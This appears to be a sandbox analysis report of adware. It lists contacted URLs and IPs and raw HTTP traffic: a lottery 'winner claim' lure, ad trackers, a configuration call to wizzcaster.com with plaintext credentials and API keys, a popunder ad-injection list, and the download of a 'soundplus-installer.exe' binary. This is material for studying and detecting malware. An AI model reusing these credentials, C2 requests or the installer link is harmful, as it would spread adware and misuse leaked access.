hxxp://prod.l.ssl.global.fastlylb.net/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV
hxxp://us-eu.legacy.fastlylb.net/css/register/CertifiedWinnerRSP.82125.cssasp?lang=en
hxxp://us-eu.legacy.fastlylb.net///fonts/OCRAStd.otf?
hxxp://www-google-analytics.l.google.com/analytics.js
hxxp://stats.l.doubleclick.net/dc.js
hxxp://us-eu.legacy.fastlylb.net///images/en/default/register/CertifiedWinnerRSP/stamps_min.png
hxxp://us-eu.legacy.fastlylb.net///images/en/default/register/CertifiedWinnerRSP/barcode_min.png
hxxp://us-eu.legacy.fastlylb.net///images/en/default/register/CertifiedWinnerRSP/senderscore_min.png
hxxp://e5631.b.akamaiedge.net/compliance/seal_js.php?code=573aebfa59bfcc15516aa10a75f09b9b&style=normal&size=105x54&language=en
hxxp://us-eu.legacy.fastlylb.net///images/en/default/register/CertifiedWinnerRSP/bgtile_min.png
hxxp://us-eu.legacy.fastlylb.net///images/en/default/register/CertifiedWinnerRSP/dottedlinetalltile_min.png
hxxp://www-google-analytics.l.google.com/r/collect?v=1&_v=j47&a=896694813&t=pageview&_s=1&dl=http://www.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV&ul=en-us&de=utf-8&dt=CERTIFIED WINNER CLAIM FORM&sd=32-bit&sr=1916x902&vp=1896x749&je=0&fl=11.6 r602&_u=AEAAAAAAI~&jid=288336700&cid=1534724702.1476511708&tid=UA-2349802-17&_r=1&z=161937165
hxxp://stats.l.doubleclick.net/r/__utm.gif?utmwv=5.6.7dc&utms=1&utmn=995184914&utmhn=www.freelotto.com&utmcs=utf-8&utmsr=1916x902&utmvp=1896x749&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=CERTIFIED WINNER CLAIM FORM&utmhid=896694813&utmr=-&utmp=/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV&utmht=1476511708672&utmac=UA-2349802-18&utmcc=__utma=30605800.1534724702.1476511708.1476511709.1476511709.1;+__utmz=30605800.1476511709.1.1.utmcsr=YTZ|utmccn=EveryoneWinsTV|utmcmd=Display|utmctr=CPA|utmcct=CertifiedWinnerRSP;&utmjid=2008461925&utmredir=3&utmu=qBAAAAAAAAAAAAAAAAABAAAE~
hxxp://e5631.b.akamaiedge.net/seal_image.php?customerId=573aebfa59bfcc15516aa10a75f09b9b&size=105x54&style=normal
hxxp://seal.globalsign.com/SiteSeal/images/gs_noscript_125-50_en.gif	198.41.215.154
hxxp://seal.globalsign.com/SiteSeal/gmogs_image_125-50_en_blue.js	198.41.215.154
hxxp://seal.globalsign.com/SiteSeal/siteSeal/siteSeal/siteSeal.do?p1=www.freelotto.com&p2=SZ125-50&p3=image&p4=en&p5=V0022&p6=S001&p7=http	198.41.215.154
hxxp://us-eu.legacy.fastlylb.net/xmljs/jquery-1.7.2/jquery.min.82125.js
hxxp://us-eu.legacy.fastlylb.net/xmljs/FL.82125.js
hxxp://us-eu.legacy.fastlylb.net/xmljs/countrystate.min.82125.js?lang=en
hxxp://us-eu.legacy.fastlylb.net/xmljs/reg_skins.82125.js?lang=en
hxxp://us-eu.legacy.fastlylb.net/xmljs/flzipcode.min.82125.js
hxxp://seal.globalsign.com/SiteSeal/siteSeal/siteSeal/siteSealImage.do?p1=www.freelotto.com&p2=SZ125-50&p3=image&p4=en&p5=V0022&p6=S001&p7=http&deterDn=	198.41.215.154
hxxp://us-eu.legacy.fastlylb.net/xmljs/swfobject.2.2.82125.js
hxxp://us-eu.legacy.fastlylb.net/xmljs/epu.82125.js?noepu=1&showsspop=&popid=&partner=1066987
hxxp://prod.l.ssl.global.fastlylb.net/offer.asp?offer=14999&r=0.412759496485389
hxxp://prod.l.ssl.global.fastlylb.net/offer.asp?offer=10670975&id=
hxxp://pagead.l.doubleclick.net/pagead/conversion.js
hxxp://dx.steelhousemedia.com/spx?dxver=4.0.0&shaid=12563&tdr=&plh=http://www.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV&cb=92883198028657800	5.153.22.107
hxxp://pxtm.steelhousemedia.com/st?fdx=1&dxver=4.0.0&shaid=12563&plh=http://www.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV&cb=92883198028657800&shpn=Free Lotto&shpi=https://f-pinid.a.ssl.fastly.net///images/en/default/2015/FLLogo.png&shps=FreeLotto&shadditional=sh_conversion=SHBLOCK&conv=0
hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt
hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab
hxxp://pxtm.steelhousemedia.com/st?fdx=1&dxver=4.0.0&shaid=12563&plh=http://www.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV&shpn=Free Lotto&shpi=https://f-pinid.a.ssl.fastly.net///images/en/default/2015/FLLogo.png&shps=FreeLotto&shadditional=sh_conversion=SHBLOCK&conv=0&cb=1476511698054251&shguid=null&shgts=null
hxxp://ttd-euwest-match-adsrvr-org-139334178.eu-west-1.elb.amazonaws.c/track/cmf/generic?ttd_pid=steelhouse&ttd_tpi=1
hxxp://ttd-euwest-match-adsrvr-org-139334178.eu-west-1.elb.amazonaws.c/track/cmb/generic?ttd_pid=steelhouse&ttd_tpi=1
hxxp://sealserver.trustkeeper.net/seal_image.php?customerId=573aebfa59bfcc15516aa10a75f09b9b&size=105x54&style=normal
hxxp://cdn1.cosmicwin.com/pp/promo/9302/img/btns.png	78.140.166.6
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab	212.30.134.183
hxxp://f.pinid.com/css/register/CertifiedWinnerRSP.82125.cssasp?lang=en	151.101.60.129
hxxp://ssif1.globalsign.com/SiteSeal/siteSeal/siteSeal/siteSeal.do?p1=www.freelotto.com&p2=SZ125-50&p3=image&p4=en&p5=V0022&p6=S001&p7=http	198.41.214.154
hxxp://www.freelotto.com/offer.asp?offer=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e	151.101.16.70
hxxp://cdn1.cosmicwin.com/pp/promo/9302/img/logo-24-2.png	78.140.166.6
hxxp://match.adsrvr.org/track/cmb/generic?ttd_pid=steelhouse&ttd_tpi=1	54.247.72.23
hxxp://cdn1.cosmicwin.com/pp/promo/9302/css/main.css	78.140.166.6
hxxp://ssif1.globalsign.com/SiteSeal/siteSeal/siteSeal/siteSealImage.do?p1=www.freelotto.com&p2=SZ125-50&p3=image&p4=en&p5=V0022&p6=S001&p7=http&deterDn=	198.41.214.154
hxxp://cdn1.cosmicwin.com/pp/promo/9302/img/logo-24-1.png	78.140.166.6
hxxp://f.pinid.com/xmljs/countrystate.min.82125.js?lang=en	151.101.60.129
hxxp://www.google-analytics.com/r/collect?v=1&_v=j47&a=896694813&t=pageview&_s=1&dl=http://www.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV&ul=en-us&de=utf-8&dt=CERTIFIED WINNER CLAIM FORM&sd=32-bit&sr=1916x902&vp=1896x749&je=0&fl=11.6 r602&_u=AEAAAAAAI~&jid=288336700&cid=1534724702.1476511708&tid=UA-2349802-17&_r=1&z=161937165	216.58.209.46
hxxp://f.pinid.com/xmljs/jquery-1.7.2/jquery.min.82125.js	151.101.60.129
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt	212.30.134.183
hxxp://f.pinid.com/xmljs/FL.82125.js	151.101.60.129
hxxp://f.pinid.com/xmljs/epu.82125.js?noepu=1&showsspop=&popid=&partner=1066987	151.101.60.129
hxxp://www.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV	151.101.16.70
hxxp://sealserver.trustkeeper.net/compliance/seal_js.php?code=573aebfa59bfcc15516aa10a75f09b9b&style=normal&size=105x54&language=en
hxxp://www.googleadservices.com/pagead/conversion.js	173.194.113.218
hxxp://stats.g.doubleclick.net/r/__utm.gif?utmwv=5.6.7dc&utms=1&utmn=995184914&utmhn=www.freelotto.com&utmcs=utf-8&utmsr=1916x902&utmvp=1896x749&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=CERTIFIED WINNER CLAIM FORM&utmhid=896694813&utmr=-&utmp=/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV&utmht=1476511708672&utmac=UA-2349802-18&utmcc=__utma=30605800.1534724702.1476511708.1476511709.1476511709.1;+__utmz=30605800.1476511709.1.1.utmcsr=YTZ|utmccn=EveryoneWinsTV|utmcmd=Display|utmctr=CPA|utmcct=CertifiedWinnerRSP;&utmjid=2008461925&utmredir=3&utmu=qBAAAAAAAAAAAAAAAAABAAAE~	74.125.205.154
hxxp://www.freelotto.com/offer.asp?offer=10670975&id=	151.101.16.70
hxxp://f.pinid.com///fonts/OCRAStd.otf?	151.101.60.129
hxxp://f.pinid.com///images/en/default/register/CertifiedWinnerRSP/bgtile_min.png	151.101.60.129
hxxp://px.steelhousemedia.com/st?fdx=1&dxver=4.0.0&shaid=12563&plh=http://www.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV&shpn=Free Lotto&shpi=https://f-pinid.a.ssl.fastly.net///images/en/default/2015/FLLogo.png&shps=FreeLotto&shadditional=sh_conversion=SHBLOCK&conv=0&cb=1476511698054251&shguid=null&shgts=null	50.97.130.117
hxxp://f.pinid.com///images/en/default/register/CertifiedWinnerRSP/senderscore_min.png	151.101.60.129
hxxp://f.pinid.com///images/en/default/register/CertifiedWinnerRSP/barcode_min.png	151.101.60.129
hxxp://stats.g.doubleclick.net/dc.js	74.125.205.154
hxxp://px.steelhousemedia.com/st?fdx=1&dxver=4.0.0&shaid=12563&plh=http://www.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV&cb=92883198028657800&shpn=Free Lotto&shpi=https://f-pinid.a.ssl.fastly.net///images/en/default/2015/FLLogo.png&shps=FreeLotto&shadditional=sh_conversion=SHBLOCK&conv=0	50.97.130.117
hxxp://f.pinid.com///images/en/default/register/CertifiedWinnerRSP/dottedlinetalltile_min.png	151.101.60.129
hxxp://www.google-analytics.com/analytics.js	216.58.209.46
hxxp://f.pinid.com/xmljs/reg_skins.82125.js?lang=en	151.101.60.129
hxxp://cdn1.cosmicwin.com/pp/promo/9302/img/txt2.png	78.140.166.6
hxxp://www.freelotto.com/offer.asp?offer=14999&r=0.412759496485389	151.101.16.70
hxxp://f.pinid.com/xmljs/flzipcode.min.82125.js	151.101.60.129
hxxp://match.adsrvr.org/track/cmf/generic?ttd_pid=steelhouse&ttd_tpi=1	54.247.72.23
hxxp://cdn1.cosmicwin.com/pp/promo/9302/img/bg-desktop.jpg	78.140.166.6
hxxp://js-agent.newrelic.com/nr-974.min.js	151.101.60.175
hxxp://cdn1.cosmicwin.com/pp/promo/9302/img/txt1.png	78.140.166.6
hxxp://f.pinid.com///images/en/default/register/CertifiedWinnerRSP/stamps_min.png	151.101.60.129
hxxp://f.pinid.com/xmljs/swfobject.2.2.82125.js	151.101.60.129
4917130.fls.doubleclick.net	173.194.113.219
connect.facebook.net	31.13.92.14
googleads.g.doubleclick.net	173.194.113.217
ajax.googleapis.com	216.58.214.202
ww.steelhousemedia.com	5.153.22.103

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /st?fdx=1&dxver=4.0.0&shaid=12563&plh=http://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV&cb=92883198028657800&shpn=Free Lotto&shpi=https://f-pinid.a.ssl.fastly.net///images/en/default/2015/FLLogo.png&shps=FreeLotto&shadditional=sh_conversion=SHBLOCK&conv=0 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: px.steelhousemedia.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:08:18 GMT

Content-Type: application/javascript;charset=utf-8

Access-Control-Allow-Origin: *

P3P: CP="NON DSP COR NID CURa ADMa DEVa PSAa PSDa OUR STP UNI COM NAV INT STA PRE"

Set-Cookie: guid=1641febf-07a8-4564-8231-a5444fbd193a;Path=/;Domain=.steelhousemedia.com;Expires=Tue, 15-Oct-2019 06:08:18 GMT

Expires: Thu, 01 Jan 1970 00:00:00 GMT

Content-Encoding: gzip

Connection: close
..........uTao.6..._...%..,[.c.c.&M..YV4..-...:..eQ!........x....t|w|.
.I.<..O...!s.h.6o/........d..........._0..Sn|.e....s...y..O...y.$J.
..L...|..O.1..|.....j*........q...w.OyB....pc.C..-....o.......v....5..
........f.u........jT.X....^G...WH.7....^..l.a.K=...T..kQ..?.V...}Jg.h
..>.V.~....X.......>..w({..u..]....M..6.QG......pt@..@....:....|
;.v?.L.F.%....!....%..p1.gn..t.......A.{........u.N...P{....z.;e......
[.......&....w.[k.3...<,I. ...}r<..\i.H......e.D..y..V..y...Jj..
.7,...S...[[email protected]..{mR..}......G....]..B.<e...SV..K^. 7..
cHD...\..X.X.Lp.q....#..e..............y..I.>......f......f..fa.l..
......L.r....g....c.F.@..*./..ReE.A.SH..._...e...r5.eS.Y...3[..[.zay.L
.........c.4.~..v.........=.,.r.M........z.BI#....\...-da.....9I...5..
.(:.. l...1.....Yd.....w......%Q.$....1.)..*`../.R....3.B$..?D...z...?
.%.%&{.....n..F...b,ID&.f.#>...h.!n..h4.G|.:.... ......N......?....
f......{...k.....B.......F..<..n.p.o 7.7B].V.......{.9`..... r.....
.y..Q{..&&.B.".C.u.$.%f.A..)..X..4....?~Vf...{C|\\^.T.E.:v].{n..X.o.eT
/.,.O...^.<....s..4l.9...F.^...........0.g......!....}.r.......
<<< skipped >>>

POST /api/v1/configuration?username=csdi&password=68b07047-1e8d-47ef-8332-09a2c83ad539 HTTP/1.1

Content-Type: text/xml

Host: wizzcaster.com

Content-Length: 0

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:08:00 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

Set-Cookie: laravel_session=eyJpdiI6IlJrR3ZMK0JwdWF2SE5hVXdjUjZKb1E9PSIsInZhbHVlIjoiSmpuTG9uK3dVN3NQYXJwVmtVUU5ZOUwxaWFpbnJiZnlYUjV2ODhYQWkrZnhaeXM4bTQxdFRUdzVtSzNXQVlpZnZWYTdEVU5cL3RJQnJqSlFlTlNMbEtBPT0iLCJtYWMiOiJiMTdjZmQ0M2M0N2MxMzM3NjA5ODI4MzBmZGYxMDIyNTRkNTI5YTA2YTA1YzU3NmI4MTZmZjllYjlmYjkyMDlkIn0=; expires=Sat, 15-Oct-2016 08:08:01 GMT; Max-Age=7200; path=/; httponly

Content-Length: 135

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Content-Type: application/json
{"username":"csdi","api_key":"56f25c2b4eced","wizztracki_user_name":"c
sdi","wizztracki_api_key":"e3b93cef-8bd4-11e5-8538-0cc47a47968c"}t>....


POST /api/v2/ads?user_name=csdi&api_key=56f25c2b4eced&days_after_install=0 HTTP/1.1

Content-Type: text/xml

Host: wizzcaster.com

Content-Length: 0

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:08:01 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

Set-Cookie: laravel_session=eyJpdiI6IkdjZDdGK2ZxeEJHMFVBUTBNR2t1Ync9PSIsInZhbHVlIjoiMUtlRFVxQzBpRUwyV1N6U0hHcEZXMUl5akpcL2FVY3V2MzM4SkhEczVxajh0V1NCOXd3XC9zcGs1RVllb0l2TVNIM2p4QjYrbkNYT1lPRDNhQmw2bmJ4QT09IiwibWFjIjoiNjQ0YTg4NjI4YmUwZWU0OTIwYjQ5NzgzMGYxMmE0OGJmOWFhMTY3ZmQzNDJiMTA3MGE0ZmUzNTM5ODFlZmQxOCJ9; expires=Sat, 15-Oct-2016 08:08:01 GMT; Max-Age=7200; path=/; httponly

Content-Length: 2168

Content-Type: application/json
{"time_between_prints":"10","print_list":[{"link":"http:\/\/VVV.xmedia
serve.com\/apu.php?n=&zoneid=14335&cb=INSERT_RANDOM_NUMBER_HERE&popund
er=1&direct=1","campaign_id":"68","campaign_config_id":"403","max_show
_per_day_per_user":"30","max_show_per_day_total":"2147483647","ie":"1"
,"chrome":"1","firefox":"1","start_time":"00:00:00","end_time":"00:00:
00"},{"link":"http:\/\/syndication.exdynsrv.com\/splash.php?idzone=216
9829&type=8","campaign_id":"160","campaign_config_id":"513","max_show_
per_day_per_user":"8","max_show_per_day_total":"2147483647","ie":"1","
chrome":"1","firefox":"1","start_time":"00:00:00","end_time":"00:00:00
"},{"link":"http:\/\/onclickads.net\/afu.php?zoneid=718340","campaign_
id":"140","campaign_config_id":"477","max_show_per_day_per_user":"10",
"max_show_per_day_total":"2147483647","ie":"1","chrome":"1","firefox":
"1","start_time":"00:00:00","end_time":"00:00:00"},{"link":"http:\/\/6
38.reimsrvcm.com\/WhiteLabelBidRequestHandlerServlet?oid=638&width=1&h
eight=100&pubid=160157&tagid=925977&pstn=ENTER_PLACEMENT_ID_HERE&noaop
=1&revmod=INSERT_CONTENT_TYPE&encoded=1&cb=INSERT_CACHEBUSTER&keywords
=INSERT_COMMA_SEPARATED_KEYWORDS&cirf=","campaign_id":"165","campaign_
config_id":"524","max_show_per_day_per_user":"10","max_show_per_day_to
tal":"2147483647","ie":"1","chrome":"1","firefox":"1","start_time":"00
:00:00","end_time":"00:00:00"},{"link":"http:\/\/ads.ad4game.com\/www\
/delivery\/pu.php?zoneid=58740","campaign_id":"141","campaign_config_i
d":"478","max_show_per_day_per_user":"10","max_show_per_day_total"
<<< skipped >>>

GET /st?fdx=1&dxver=4.0.0&shaid=12563&plh=http://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV&shpn=Free Lotto&shpi=https://f-pinid.a.ssl.fastly.net///images/en/default/2015/FLLogo.png&shps=FreeLotto&shadditional=sh_conversion=SHBLOCK&conv=0&cb=1476511698054251&shguid=null&shgts=null HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: px.steelhousemedia.com

Connection: Keep-Alive

Cookie: guid=1641febf-07a8-4564-8231-a5444fbd193a

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:08:20 GMT

Content-Type: application/javascript;charset=utf-8

Access-Control-Allow-Origin: *

P3P: CP="NON DSP COR NID CURa ADMa DEVa PSAa PSDa OUR STP UNI COM NAV INT STA PRE"

Set-Cookie: guid=1641febf-07a8-4564-8231-a5444fbd193a;Path=/;Domain=.steelhousemedia.com;Expires=Tue, 15-Oct-2019 06:08:20 GMT

Set-Cookie: tt="H4sIAAAAAAAAAKtWKlOyMtJRMjQyNTOON7IwtlCyMjQxNzM1NDQ3MDA1MNZR8guKh8maGQFlkUXMLY3RRCzMDdFFwGbWAgA6gSWRagAAAA==";Path=/;Domain=.px.steelhousemedia.com;Expires=Tue, 15-Oct-2019 06:08:20 GMT

Expires: Thu, 01 Jan 1970 00:00:00 GMT

Content-Encoding: gzip

Connection: close
............ko.6....bK.L.v.:...M[.X..K.b....)..L.$......)9.....a......
x.;].."5\. ....S. ....T.l.pn....c..... m. [email protected] ..1.Q...
...G...[..."../.Fo..^[email protected].@S,. ]!.......h...).3..'..S.]~8.M.dU..C.
 ..\X,.NOf..F......).'..l<...8|:..i..~v....x<...x...lLfq<:9a.
\[email protected].."<.n...m.`...>B.*.!
"`G|acd)..P?.1.W\p....D....".Ls.?.$9..0...e....(.N.x{q!s.*.[.... #.r[.
......}.p0...W.....Z"..i..........O.G.!..kH.....F;......$&-..Z...*..E.
.A...9. ....z[.....Z..8.{.iD..BV..5.T.Q)Sb.F..F....o...Y......;LeZ/!.(
U...M.,..|......95...>...yaZD.m..m.....o..T.....9.b...w...^/T..J.w.
.......C......Q..({.6g.5U..^...Y........3...q.en$d......ka'.'..DF^..E.
..".6.........ah{...9{..Z....A...;I.h..J..X.......:..t.>{...B.W..&l
t;..R.w.H:....".G.&..x..=.U..=.).c...^..T...g....=.....E...d\.7.......
..Y.jG.....Q.[$ ..Yh..aA......y..y#...E....`Y.h.D.m.6fyf[1.X,z.m....Hk
/.^<. ...E.HD&.M1.,...C....B.PJ..Wf.I...D....""*w...T..5.!....G...r
'C.VUs`P...PJB.....v,9gF(......o..'_......f R ..j^.5.}3..%P?.?..];=..,
X3.#...........)K....{......,a ...i."......Ea.7.<.?}~r<.....>
z..7...||....yS_.........gS?........5p.g.}...G..h.....7^.........Xl..i
._...c.V.......Z..t.z....~h....1....'.w....v..R|..> {..A.@ ......4.
..z.0.MT2.."......7.v3.O.b...-.....W.M.....
<<< skipped >>>

GET /nr-974.min.js HTTP/1.1

Accept: */*

Referer: hXXp://cosmicwin.com/vulkanchampion/p9302/?atp=MH RON&plid=1706&bnid=7462&goto=sitereg&face=casino

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: js-agent.newrelic.com

Connection: Keep-Alive

HTTP/1.1 200 OK

x-amz-id-2: Wxfx3VQkait9OIk9YrxJnWItTbDZkH0ay/qasqs pvyRhLMFWPBe4BN0dj7x1ZA5XlBnPU7/ iI=

x-amz-request-id: 8F41B2A6A0D29F6C

Last-Modified: Tue, 16 Aug 2016 00:15:00 GMT

ETag: "634571f9ce8c2fed916ddca30914f48a"

Content-Type: application/javascript

Server: AmazonS3

Content-Length: 22761

Accept-Ranges: bytes

Date: Sat, 15 Oct 2016 06:08:13 GMT

Via: 1.1 varnish

Connection: keep-alive

X-Served-By: cache-lhr6320-LHR

X-Cache: HIT

X-Cache-Hits: 116

X-Timer: S1476511693.086453,VS0,VE0

Vary: Accept-Encoding

Cache-Control: public, max-age=3600
!function(n,e,t){function r(t,i){if(!e[t]){if(!n[t]){var a="function"=
=typeof __nr_require&&__nr_require;if(!i&&a)return a(t,!0);if(o)return
 o(t,!0);throw new Error("Cannot find module '" t "'")}var s=e[t]={exp
orts:{}};n[t][0].call(s.exports,function(e){var o=n[t][1][e];return r(
o||e)},s,s.exports)}return e[t].exports}for(var o="function"==typeof _
_nr_require&&__nr_require,i=0;i<t.length;i  )r(t[i]);return r}({1:[
function(n,e,t){e.exports=function(n,e){return"addEventListener"in win
dow?addEventListener(n,e,!1):"attachEvent"in window?attachEvent("on" n
,e):void 0}},{}],2:[function(n,e,t){function r(n,e,t,r){p("bstAgg",[n,
e,t,r]),l[n]||(l[n]={});var i=l[n][e];return i||(i=l[n][e]={params:t||
{}}),i.metrics=o(r,i.metrics),i}function o(n,e){return e||(e={count:0}
),e.count =1,c(n,function(n,t){e[n]=i(t,e[n])}),e}function i(n,e){retu
rn e?(e&&!e.c&&(e={t:e.t,min:e.t,max:e.t,sos:e.t*e.t,c:1}),e.c =1,e.t 
=n,e.sos =n*n,n>e.max&&(e.max=n),n<e.min&&(e.min=n),e):{t:n}}fun
ction a(n,e){return e?l[n]&&l[n][e]:l[n]}function s(n){for(var e={},t=
"",r=!1,o=0;o<n.length;o  )t=n[o],e[t]=u(l[t]),e[t].length&&(r=!0),
delete l[t];return r?e:null}function u(n){return"object"!=typeof n?[]:
c(n,f)}function f(n,e){return e}var c=n(30),p=n("handle"),l={};e.expor
ts={store:r,take:s,get:a}},{}],3:[function(n,e,t){function r(n,e,t){"s
tring"==typeof e&&("/"!==e.charAt(0)&&(e="/" e),d.customTransaction=(t
||"hXXp://custom.transaction") e)}function o(n,e){var t=e||n;c.store("
cm","finished",{name:"finished"},{time:t-d.offset}),i(n,{name:"fin
<<< skipped >>>

GET /download/1/soundplus-installer.exe HTTP/1.1

Host: dl.wizzuniquify.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:07:37 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

content-disposition: attachment; filename="soundplus-installer.exe"

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: application/x-msdownload
16ae00..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L...Z..X.........."...0.................. ........@.. ................
....................@[email protected].......,...
......................................................................
... ............... ..H............text........ ......................
 ..`.rsrc...,...........................@[email protected]....................
[email protected]"..............P.......
.........................................0..6.......~..........%..|.o.
................(....(.......&...*.*..........//.......0...........(..
....(.....o....s..... o.....s....%.o....%.o.....(.....o....o......s...
.....s .....i.,.....%......io!......o"...o"...(#........o$...r...p(%..
.o&...*..-.r...ps'...z.((...o)...%-.r3..ps'...z.......%...o*...&*.rQ..
p.....*....0..C.......rD..p...... ...X....0...( ......X....2..(.......
...~....(......&..*.......(..?........(,...*.~....-.rJ..p.....(-...o..
..s/........~....*.~....*.......*.~....*..(0...*Vs....(1...t.........*
BSJB............v2.0.50727......l.......#~..x.......#Strings..........
..#US.........#GUID.......@...#Blob...........WU.........3........3...
................1.............................................Z.......
........&...........l.......S.....S...}.S.....S.....S.....S...).S.....
....u.....D.S...D.....a.................e.......j.....#...G...........
......Z.......1...z./...2...................................u.6...
<<< skipped >>>

POST /api/v1/configuration?username=csdi&password=68b07047-1e8d-47ef-8332-09a2c83ad539 HTTP/1.1

Content-Type: text/xml

Host: wizzcaster.com

Content-Length: 0

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:08:00 GMT

Server: Apache/2.4.10 (Debian)

Cache-Control: no-cache

